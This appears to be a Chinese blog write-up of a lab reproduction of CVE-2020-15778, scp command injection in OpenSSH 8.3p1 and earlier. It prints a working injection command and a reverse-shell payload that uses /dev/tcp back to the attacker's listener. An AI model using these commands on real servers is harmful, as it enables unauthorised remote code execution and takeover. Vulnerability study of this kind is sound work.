OpenSSH_8.3-命令注入漏洞攻击与修复

本文详细介绍了OpenSSH 8.3及以下版本的命令注入漏洞(CVE-2020-15778),包括攻击原理、复现步骤、实际攻击测试及GetShell方法。同时,提供了两种防御措施,一是关闭特定网段的SSH访问,二是升级到OpenSSH 8.4p1版本以修复漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

OpenSSH_8.3及以下-命令注入漏洞攻击与修复

漏洞:CVE-2020-15778
2020年6月9日发现漏洞,2020年7月18日公开漏洞。

攻击原理

使用SCP中远程功能进行命令注入。

漏洞复现要求

OpenSSH版本 =<8.3p1

ssh连接密码

攻击环境

攻击方:kali:192.168.0.130

靶机: CentOS7:192.168.0.187

攻击测试

kali:

上传任意文件到靶机上,文件允许为空,因为上传的文件不是主角。而是``里面的命令作为注入点进行攻击。

scp dic.txt root@192.168.0.187:'`touch /tmp/test.txt` /tmp'

命令解读:使用scp将本地文件dic.txt上传到服务器root@192.168.0.187/tmp文件夹,使用``括起来的touch /tmp/test.txt就是注入的命令,会生成一个新的文件test.txt

靶机:

靶机查看/tmp目录下的文件:

[root@localhost tmp]# ls
dic.txt  test.txt

这样就实现了远程命令的执行。

GetShell

kali:

使用命令获取靶机的权限。

#使用一个窗口开启nc进行监听
nc -lvvp 7777
#开启另一个窗口,上传反弹shell的命令
scp dic.txt root@192.168.0.187:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'

运行监听:

评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值